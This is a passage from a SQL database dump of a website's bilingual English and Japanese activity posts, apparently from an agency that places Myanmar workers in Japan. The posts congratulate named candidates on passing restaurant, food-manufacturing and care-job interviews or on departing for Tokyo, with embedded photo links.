src=\"/sites/default/files/inline-images/0-02-01-dde55e97ef8570451473e9ba3c39964756ff73cce6ea1328cb68b967d9ea335e_f57cf6e077154eb6.jpg\" data-entity-uuid=\"8a2b75db-1149-475d-beaa-537ad6296fc0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de1713cd42ca8420f980eec7f16f47b1a1ff1ee72432726e2ea27ed343cae8bf_da46f9ee7892a8f5.jpg\" data-entity-uuid=\"c96199f9-2828-4fbf-bd04-97c48cb5b0a1\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 111, 519, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2><p>KHIN KHIN KYAW、THET MYAT MYAT KHINE、HNIN THAZIN AUNG、WIN PYAE SHAN、YU YU NWAY の皆さん、特定外食ビザを取得して (午前 11:35) に日本の大都市 (東京) へ出発します。日本でより良い機会と健康を祈っています。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-09af1556503cf895dc500a57405f7aa13bda935f637a35f55b84172b11f2a2ae_d81fb0503c8b859b.jpg\" data-entity-uuid=\"1d399c1c-d9d3-448c-aa45-06b499fbf9b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-aa1636055b47104715df7e99e33ca9902c656871af49c4863a99ac3efcbc0279_227b57d23debae7c.jpg\" data-entity-uuid=\"f726a3fc-4a54-40eb-94b1-ed5ae6f33a7e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-c00edf6b50b4e5f2cd07650374690479f7dddefba6627e6fb334a01e67f6ea28_153d57af8899ba69.jpg\" data-entity-uuid=\"12109f45-4ed9-46f9-9a48-bb4ba36ed3d0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dde55e97ef8570451473e9ba3c39964756ff73cce6ea1328cb68b967d9ea335e_f57cf6e077154eb6.jpg\" data-entity-uuid=\"8a2b75db-1149-475d-beaa-537ad6296fc0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de1713cd42ca8420f980eec7f16f47b1a1ff1ee72432726e2ea27ed343cae8bf_da46f9ee7892a8f5.jpg\" data-entity-uuid=\"c96199f9-2828-4fbf-bd04-97c48cb5b0a1\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 112, 521, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congrats to ADIN MIN MAW &amp; MIN KHANT KYAW for passing the Job Interview with TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img src=\"/sites/default/files/inline-images/ADIN%20MIN%20MAW.jpg\" data-entity-uuid=\"2712406c-f5a8-4478-9512-aaa7c0c73aef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/MIN%20KHANT%20KYAW.jpg\" data-entity-uuid=\"108f5c40-9c4f-4f0d-817d-7efdc4dc3464\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 112, 521, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>ADIN MIN MAW</strong> さんと <strong>MIN KHANT KYAW </strong>さんが TOKUTEI GAISHOKU (レストラン) の面接に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/ADIN%20MIN%20MAW.jpg\" data-entity-uuid=\"2712406c-f5a8-4478-9512-aaa7c0c73aef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/MIN%20KHANT%20KYAW.jpg\" data-entity-uuid=\"108f5c40-9c4f-4f0d-817d-7efdc4dc3464\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 113, 523, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations LWIN PHYO KO KO &amp; AUNG PYAE PAING &amp; EI KHIN &amp; YU YU NYEIN &amp; THAN HTUN NAING &amp; HTET LIN AUNG &amp; THAE KO KO &nbsp;For the departure to japan.Wishing for more success and good health in Tokyo.</p><img src=\"/sites/default/files/inline-images/0-02-01-5e6599f74ce48960506ef87cdf74ccde4b2c4022b1e9157e0b65b27ce328842b_35f4dbe1efe18b05.jpg\" data-entity-uuid=\"b0ddb77a-6f55-4442-9273-fa889527f7b6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-72d8d0346762fc04e52a3b41392da8fd3acd5015a12fe31b28c5ec097af9f638_80c9eef0de5a61ed.jpg\" data-entity-uuid=\"efb2aa85-d67d-4cbe-ac0b-5ca8e9f8913b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-8389e9859ff4de0960b080d64de4fece40f128cee0002f45cd85ffdee27efa3e_fbfb8883ae727313.jpg\" data-entity-uuid=\"fb550bf6-9d8d-49cb-b0b4-fef8e10c15be\" data-entity-type=\"file\"><p><img><img src=\"/sites/default/files/inline-images/0-02-01-ec6f67285620aebc46fcfc580ef126da63111fe2e6daba7c90c86f65dbff3d82_aedc66b32a612720.jpg\" data-entity-uuid=\"d6b083c7-c30e-4532-88a9-fcd441c7e05d\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 113, 523, 'ja', 0, '<blockquote><h2>おめでとう！</h2><p>LWIN PHYO KO KO &amp; AUNG PYAE PAING &amp; EI KHIN &amp; YU YU NYEIN &amp; THAN HTUN NAING &amp; HTET LIN AUNG &amp; THAE KO KO 日本へのご出発おめでとうございます。東京でのさらなる成功と健康をお祈りしています。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-5e6599f74ce48960506ef87cdf74ccde4b2c4022b1e9157e0b65b27ce328842b_35f4dbe1efe18b05.jpg\" data-entity-uuid=\"b0ddb77a-6f55-4442-9273-fa889527f7b6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-72d8d0346762fc04e52a3b41392da8fd3acd5015a12fe31b28c5ec097af9f638_80c9eef0de5a61ed.jpg\" data-entity-uuid=\"efb2aa85-d67d-4cbe-ac0b-5ca8e9f8913b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-8389e9859ff4de0960b080d64de4fece40f128cee0002f45cd85ffdee27efa3e_fbfb8883ae727313.jpg\" data-entity-uuid=\"fb550bf6-9d8d-49cb-b0b4-fef8e10c15be\" data-entity-type=\"file\"><p><img><img src=\"/sites/default/files/inline-images/0-02-01-ec6f67285620aebc46fcfc580ef126da63111fe2e6daba7c90c86f65dbff3d82_aedc66b32a612720.jpg\" data-entity-uuid=\"d6b083c7-c30e-4532-88a9-fcd441c7e05d\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 114, 526, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations to YU MON AUNG &amp; MAY MYO KHAING for passing the Interview in TOKUTEI GAISHOKU (RESTAURANT)&nbsp;</p><img data-entity-uuid=\"9f7482db-c291-4768-b430-2517e13ac1e7\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yu%20mon%20aung.jpg\"><img data-entity-uuid=\"3d4ee8e2-e6e4-445e-ba02-8eaa9e9e098b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/may%20myo%20khaing.jpg\">', '', 'full_html'),
('activities', 0, 114, 526, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YU MON AUNG</strong>さんと<strong>MAY MYO KHAING</strong>さんがTOKUTEI GAISHOKU（レストラン）の面接に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/yu%20mon%20aung.jpg\" data-entity-uuid=\"9f7482db-c291-4768-b430-2517e13ac1e7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/may%20myo%20khaing.jpg\" data-entity-uuid=\"3d4ee8e2-e6e4-445e-ba02-8eaa9e9e098b\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 115, 528, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations&nbsp;</p><ul><li>LI SOUNG OO</li><li>THANDAR MOE</li><li>KHU RICHARD</li><li>PYAE SONE AUNG&nbsp;</li></ul><p>For passing the Interview for Food Manufacture Work in JAPAN.</p><img data-entity-uuid=\"bd25967e-7b6e-46b2-a1d9-c86de77ebd5b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khu%20richard_0.jpg\"><img data-entity-uuid=\"d952891d-b127-4a30-9005-867e578f58ee\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/Li%20soung%20oo.jpg\"><img data-entity-uuid=\"cd5a1aa0-a314-459b-b5d6-bc837dff86ae\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/pyae%20sone%20aung.jpg\"><img data-entity-uuid=\"0a976ab1-60f5-46e7-807b-ae98f29b8429\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thandar%20moe.jpg\">', '', 'full_html'),
('activities', 0, 115, 528, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>おめでとうございます。</p><ul><li>LI SOUNG OO</li><li>THANDAR MOE</li><li>KHU RICHARD</li><li>PYAE SONE AUNG&nbsp;</li></ul><p>日本での食品製造職の面接に合格しました。</p><img src=\"/sites/default/files/inline-images/khu%20richard_0.jpg\" data-entity-uuid=\"bd25967e-7b6e-46b2-a1d9-c86de77ebd5b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/Li%20soung%20oo.jpg\" data-entity-uuid=\"d952891d-b127-4a30-9005-867e578f58ee\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/pyae%20sone%20aung.jpg\" data-entity-uuid=\"cd5a1aa0-a314-459b-b5d6-bc837dff86ae\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thandar%20moe.jpg\" data-entity-uuid=\"0a976ab1-60f5-46e7-807b-ae98f29b8429\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 116, 531, 'en', 0, '<blockquote><h2>Images of 2th batch Resturtant Internship&nbsp;</h2></blockquote><p>Internships are a fantastic opportunity to gain hands-on experience and refine your skills under the guidance of seasoned professionals. I am confident that you will make the most of this opportunity and continue to excel in everything you do.</p><img src=\"/sites/default/files/inline-images/0-02-01-3f2baf66d0a137ebfa7758be8deb0d02f4985ae4f49885a04f3c718b68ee8a87_355c41511ecc3342.jpg\" data-entity-uuid=\"6905840e-3b7f-4da7-bdfa-d72bd2c49c83\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7b1314190e83997c0265fe4a8e0cb6f00268455a422a2e42356a6feb4cb06fd7_8c1b1a778b2f078c.jpg\" data-entity-uuid=\"e0c13a42-6396-4a7a-8bb7-fdac5f07316f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-39fd9b20b3cc97839078384524af9322cffb6a8611ca8a005a1e7d3af97aa5da_ff1cfa085227deac.jpg\" data-entity-uuid=\"c1327073-522d-4a77-8af8-9bde7bfde392\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-150a301825e6de18cfadd78877b1c35d4c92262c93a8521c437ed00b8321a4dd_1431aab02860f3ee.jpg\" data-entity-uuid=\"ad81fb01-2217-43d0-9129-1dbf7eb53843\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7790b6f0ead9f15aebf52270e3fad97c07e09ac41bc279a0e55317160a714a91_6c25777af47f352.jpg\" data-entity-uuid=\"6dc36c1b-83f0-4dd5-876a-2e517239825a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-83750c3cd206a9108fe122bef041987cde26578d3c95af86c74ffb08fea29ab9_cb025a850e8a54e3.jpg\" data-entity-uuid=\"09602c7a-1131-47f3-97d5-8a1060941e8c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-babd7b7242e03fbb9393f90b1a3493aa5e726d6187c5cab76e4e1c255bf9013c_2bc7f56483374f16.jpg\" data-entity-uuid=\"d4fab54c-b37f-4cf0-a797-a4a13321b01f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d6cd0eab761f54357c9afbac8947e9d3fcb04964dbcdbb2a338f04c6e45a2e06_53f1a63d6dab64a1.jpg\" data-entity-uuid=\"08f1bb66-bce4-4a43-8ee4-db2449e63f31\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 116, 531, 'ja', 0, '<blockquote><h2>第2回レストランインターンシップのイメージ&nbsp;<br>&nbsp;</h2><p>インターンシップは、経験豊かなプロフェッショナルの指導の下、実践的な経験を積み、スキルを磨く素晴らしい機会です。この機会を最大限に活用し、何事にも卓越し続けることを確信しています。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-3f2baf66d0a137ebfa7758be8deb0d02f4985ae4f49885a04f3c718b68ee8a87_355c41511ecc3342.jpg\" data-entity-uuid=\"6905840e-3b7f-4da7-bdfa-d72bd2c49c83\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7b1314190e83997c0265fe4a8e0cb6f00268455a422a2e42356a6feb4cb06fd7_8c1b1a778b2f078c.jpg\" data-entity-uuid=\"e0c13a42-6396-4a7a-8bb7-fdac5f07316f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-39fd9b20b3cc97839078384524af9322cffb6a8611ca8a005a1e7d3af97aa5da_ff1cfa085227deac.jpg\" data-entity-uuid=\"c1327073-522d-4a77-8af8-9bde7bfde392\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-150a301825e6de18cfadd78877b1c35d4c92262c93a8521c437ed00b8321a4dd_1431aab02860f3ee.jpg\" data-entity-uuid=\"ad81fb01-2217-43d0-9129-1dbf7eb53843\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7790b6f0ead9f15aebf52270e3fad97c07e09ac41bc279a0e55317160a714a91_6c25777af47f352.jpg\" data-entity-uuid=\"6dc36c1b-83f0-4dd5-876a-2e517239825a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-83750c3cd206a9108fe122bef041987cde26578d3c95af86c74ffb08fea29ab9_cb025a850e8a54e3.jpg\" data-entity-uuid=\"09602c7a-1131-47f3-97d5-8a1060941e8c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-babd7b7242e03fbb9393f90b1a3493aa5e726d6187c5cab76e4e1c255bf9013c_2bc7f56483374f16.jpg\" data-entity-uuid=\"d4fab54c-b37f-4cf0-a797-a4a13321b01f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d6cd0eab761f54357c9afbac8947e9d3fcb04964dbcdbb2a338f04c6e45a2e06_53f1a63d6dab64a1.jpg\" data-entity-uuid=\"08f1bb66-bce4-4a43-8ee4-db2449e63f31\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 117, 532, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>EI EAINDRA AUNG</strong> for passing Interview in TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img data-entity-uuid=\"26365585-0816-4dbf-862a-1099948f6138\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/ei%20eaindra%20aung.jpg\">', '', 'full_html'),
('activities', 0, 117, 532, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>EI EAINDRA AUNG</strong>さん、TOKUTEI GAISHOKU（レストラン）の面接に合格しました。おめでとうございます。</p><img src=\"/sites/default/files/inline-images/ei%20eaindra%20aung.jpg\" data-entity-uuid=\"26365585-0816-4dbf-862a-1099948f6138\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 118, 534, 'en', 0, '<blockquote><h2>CONGRATULATIONS!&nbsp;</h2></blockquote><p>Congratulations <strong>AUNG THURA</strong> for passing TOKUTEI GAISHOKU (Restaurant) !&nbsp;</p><img data-entity-uuid=\"3477f4ef-4abc-4909-a12d-35dbfef193ff\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/aung%20thura.jpg\">', '', 'full_html'),
('activities', 0, 118, 534, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>AUNG THURA</strong>さん、特定外食（レストラン）合格おめでとうございます！</p><img src=\"/sites/default/files/inline-images/aung%20thura.jpg\" data-entity-uuid=\"3477f4ef-4abc-4909-a12d-35dbfef193ff\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 119, 537, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>THATOE AUNG</strong> for passing TOKUTEI GAISHOKU (Restaurant)&nbsp;</p><img src=\"/sites/default/files/inline-images/thatoe%20aung.jpg\" data-entity-uuid=\"fa733f99-b77d-446a-a9ee-5a98eb807bc3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 119, 537, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>THATOE AUNGさん、</strong>TOKUTEI GAISHOKU（レストラン）合格おめでとうございます</p><img src=\"/sites/default/files/inline-images/thatoe%20aung.jpg\" data-entity-uuid=\"fa733f99-b77d-446a-a9ee-5a98eb807bc3\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 120, 539, 'en', 0, '<blockquote><h2><strong>Boss\'s Treatment To Celebrate For The Interview Passed Student</strong></h2></blockquote><p><strong>Throughout this journey,You have been an unwavering source of encouragement and mentorship. Their belief in my potential and their invaluable advice truly made a difference in preparing for this milestone. Their leadership style fosters a positive work environment where everyone feels valued and motivated to excel.</strong></p><img src=\"/sites/default/files/inline-images/0-02-01-0c2d7cbb85052b32b9b9b2141188d6e1264592cb9faba90cdfa7b0e0e275254e_9cddaf25319c70b4.jpg\" data-entity-uuid=\"42450864-8900-4ee5-be49-71951d8e2707\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1cb7f08548b9d8875b398fe974de7151e7cbfecfaaa3d5dc8afae9506e04b128_2b42e2d39d912d33.jpg\" data-entity-uuid=\"e5c60c22-aef1-424a-8da8-915020a115fd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3fa8e6b76d10c2bb84085b9bd26037db29c49e63c2a213c93f994b833011928c_81a2606370e44bd4.jpg\" data-entity-uuid=\"025f50cd-5493-4bf2-b158-db18e54ee88c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4a68eaf2f2d17fae998a4249ad95aaaa856dd15ac9cea87a656439435bfa30c5_14deb95b28de4a03.jpg\" data-entity-uuid=\"da2f7e63-9559-44f1-906d-064bff7a87f6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-5d08eb28957488839cc9aa8d7f7fe410121efaeef650a1ece11d1624edbf086a_6aa711044fae7b6.jpg\" data-entity-uuid=\"7c4a740a-721c-49d7-93a1-6013c1acb046\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-07e7cccf7254751c6a31aeb7b5fab42bafcc09a41eb88ea492da6b5ec9fd6c91_c74e759ca6c36d5c.jpg\" data-entity-uuid=\"9a63bcca-1e29-4082-b750-4fb7c1a4c2e9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7c02ffb9fc9024e520739948a987a9379e63cde74b0503b60c1ae3db3a89c147_55e2a9cff905b5bd.jpg\" data-entity-uuid=\"c34a5086-3042-437f-a14a-4b8bc1438549\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7ca2fd520735f2908ba21f9317c1b3f17a1ec4dd3794d056b4bebaead0e150a4_e76da50ac6e7da9.jpg\" data-entity-uuid=\"dfb440a7-6a47-49b6-acfb-39c4ea9d2824\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-055e37e956795c43bdd466a2a68b13ffb5aa6c26753424e9aee80253b2c85e96_66723606b1d13e7.jpg\" data-entity-uuid=\"63621b4e-69c9-428e-8d0e-288e59125e5d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-385acaa9bb806597960e6134f46b0b1100c10b2ec8d3f397d9b19b54a6f9e283_afe2b35c0e23caaa.jpg\" data-entity-uuid=\"c66ab6d9-dfff-44c5-82a5-1a400c211ecd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-518eef8eec7ba3ee0e2fc7d22da0209264265c487f3a783ce53086d68f960490_49e213809bc69b92.jpg\" data-entity-uuid=\"9fa86d3b-367b-47be-8c91-d97eb232f00c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3267c907a9213396559285ef2ff89589bea6feebc159bfae8c7afc8def669184_1532713942463601.jpg\" data-entity-uuid=\"182c1c4c-26bb-48f8-931c-2b27ba7d5995\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-477997d7024f7f23a3fc29753410617339ae86d8cf927182823774a2c386e32a_5aec6dc626b86c37.jpg\" data-entity-uuid=\"355ae490-43b3-4113-aa09-df893e415b99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d1cc1a642e8e8ecacf94405bdafc0147a61a06d7f25083687a2905ec3bac39b2_b7bb05875990f417.jpg\" data-entity-uuid=\"cca2db21-e1a5-44d0-877e-6688a0f2b994\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dafe162cb611aaa55a5cd57f7abf5d59d0d21130dd5723e21589e98479ce51d1_aab1a82c80d13523.jpg\" data-entity-uuid=\"bc2507ab-a130-434e-91d8-cf2722c501fa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dc06d8870e524430ccb6d0f7b9e080b732456328b77873cb14b9bac6131853d0_3ce7fa2e748d1400.jpg\" data-entity-uuid=\"da7c42e2-128e-4556-8597-ad3b1c415a28\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f769e4fc3aaf4cc3db7cf1af06d2affb453c0e8fa62c1da77eaeedd423f04c5d_8db4df3a5dafd163.jpg\" data-entity-uuid=\"cbbb45ad-3cd3-47da-baf4-de3bd1d85cdb\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 120, 539, 'ja', 0, '<blockquote><h2>面接合格を祝う上司の待遇</h2><p>この旅を通して、あなたは揺るぎない励ましと指導の源でした。私の可能性を信じてくださり、貴重なアドバイスをしてくださったおかげで、この節目を迎える準備ができました。彼らのリーダーシップ・スタイルは、誰もが評価され、卓越したモチベーションを感じられる前向きな職場環境を育んでいます。</p></blockquote><img src=\"/sites/default/files/inline-images/0-02-01-0c2d7cbb85052b32b9b9b2141188d6e1264592cb9faba90cdfa7b0e0e275254e_9cddaf25319c70b4.jpg\" data-entity-uuid=\"42450864-8900-4ee5-be49-71951d8e2707\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-1cb7f08548b9d8875b398fe974de7151e7cbfecfaaa3d5dc8afae9506e04b128_2b42e2d39d912d33.jpg\" data-entity-uuid=\"e5c60c22-aef1-424a-8da8-915020a115fd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3fa8e6b76d10c2bb84085b9bd26037db29c49e63c2a213c93f994b833011928c_81a2606370e44bd4.jpg\" data-entity-uuid=\"025f50cd-5493-4bf2-b158-db18e54ee88c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-4a68eaf2f2d17fae998a4249ad95aaaa856dd15ac9cea87a656439435bfa30c5_14deb95b28de4a03.jpg\" data-entity-uuid=\"da2f7e63-9559-44f1-906d-064bff7a87f6\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-5d08eb28957488839cc9aa8d7f7fe410121efaeef650a1ece11d1624edbf086a_6aa711044fae7b6.jpg\" data-entity-uuid=\"7c4a740a-721c-49d7-93a1-6013c1acb046\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-07e7cccf7254751c6a31aeb7b5fab42bafcc09a41eb88ea492da6b5ec9fd6c91_c74e759ca6c36d5c.jpg\" data-entity-uuid=\"9a63bcca-1e29-4082-b750-4fb7c1a4c2e9\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7c02ffb9fc9024e520739948a987a9379e63cde74b0503b60c1ae3db3a89c147_55e2a9cff905b5bd.jpg\" data-entity-uuid=\"c34a5086-3042-437f-a14a-4b8bc1438549\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-7ca2fd520735f2908ba21f9317c1b3f17a1ec4dd3794d056b4bebaead0e150a4_e76da50ac6e7da9.jpg\" data-entity-uuid=\"dfb440a7-6a47-49b6-acfb-39c4ea9d2824\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-055e37e956795c43bdd466a2a68b13ffb5aa6c26753424e9aee80253b2c85e96_66723606b1d13e7.jpg\" data-entity-uuid=\"63621b4e-69c9-428e-8d0e-288e59125e5d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-385acaa9bb806597960e6134f46b0b1100c10b2ec8d3f397d9b19b54a6f9e283_afe2b35c0e23caaa.jpg\" data-entity-uuid=\"c66ab6d9-dfff-44c5-82a5-1a400c211ecd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-518eef8eec7ba3ee0e2fc7d22da0209264265c487f3a783ce53086d68f960490_49e213809bc69b92.jpg\" data-entity-uuid=\"9fa86d3b-367b-47be-8c91-d97eb232f00c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-3267c907a9213396559285ef2ff89589bea6feebc159bfae8c7afc8def669184_1532713942463601.jpg\" data-entity-uuid=\"182c1c4c-26bb-48f8-931c-2b27ba7d5995\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-477997d7024f7f23a3fc29753410617339ae86d8cf927182823774a2c386e32a_5aec6dc626b86c37.jpg\" data-entity-uuid=\"355ae490-43b3-4113-aa09-df893e415b99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-d1cc1a642e8e8ecacf94405bdafc0147a61a06d7f25083687a2905ec3bac39b2_b7bb05875990f417.jpg\" data-entity-uuid=\"cca2db21-e1a5-44d0-877e-6688a0f2b994\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dafe162cb611aaa55a5cd57f7abf5d59d0d21130dd5723e21589e98479ce51d1_aab1a82c80d13523.jpg\" data-entity-uuid=\"bc2507ab-a130-434e-91d8-cf2722c501fa\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dc06d8870e524430ccb6d0f7b9e080b732456328b77873cb14b9bac6131853d0_3ce7fa2e748d1400.jpg\" data-entity-uuid=\"da7c42e2-128e-4556-8597-ad3b1c415a28\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-f769e4fc3aaf4cc3db7cf1af06d2affb453c0e8fa62c1da77eaeedd423f04c5d_8db4df3a5dafd163.jpg\" data-entity-uuid=\"cbbb45ad-3cd3-47da-baf4-de3bd1d85cdb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 121, 541, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations YEE YEE THANT &amp; NAY LIN AUNG for passing Kaigo Training Job in JAPAN.&nbsp;</p><img data-entity-uuid=\"608c33ee-1bc6-45be-a69c-4d154cd4b1bc\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/nay%20lin%20aung.jpg\"><img data-entity-uuid=\"03c42830-59a9-4b66-8481-82f1913ccf6b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yee%20yee%20thant.jpg\">', '', 'full_html'),
('activities', 0, 121, 541, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YEE YEE THANT </strong>さんと <strong>NAY LIN AUNG</strong> さんが日本での介護職研修に合格しました、おめでとうございます。</p><img src=\"/sites/default/files/inline-images/nay%20lin%20aung.jpg\" data-entity-uuid=\"608c33ee-1bc6-45be-a69c-4d154cd4b1bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/yee%20yee%20thant.jpg\" data-entity-uuid=\"03c42830-59a9-4b66-8481-82f1913ccf6b\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 122, 544, 'en', 0, '<blockquote><h2>1th Batch Internship in Sushi Resturtant</h2></blockquote><p>Beyond the technical aspects, the internship has also provided insight into Japanese culture and traditions surrounding food. From understanding the significance of fresh, seasonal ingredients to the importance of respect and discipline in the kitchen, every lesson has deepened my admiration for the rich heritage behind sushi cuisine.</p><img src=\"/sites/default/files/inline-images/0-02-01-9f8d22c92e76a81b3af76036f43e0bf8dd32fc0e03738882ea167934d692cf08_8e52a9e48a1897f3.jpg\" data-entity-uuid=\"638fbc43-354c-4a83-8619-86ed53743365\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-40b11a3f4772d17614c9f522ce6f8cc0f64b54dd6e04a045475db49f930a7334_7ec5d1ab150ab3a7.jpg\" data-entity-uuid=\"c2a23cb2-ef07-4577-baab-62bb10050347\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-91f4a6d011d24228e0d94d359bc0917a8ca3b0648f6548629f87053d21707d37_968c66caee131c1f.jpg\" data-entity-uuid=\"11b83da9-69ce-4f72-a7f1-9862d99d75ef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-396e60b1b371cc598c56fec5c3be8d0ab272b2dbcb0f6837255d43b28f745afb_3d4c2aeaabd3f8fb.jpg\" data-entity-uuid=\"e3b6955f-da68-4424-892f-1c1ab4ebf4dd\" data-entity-type=\"file\"><img 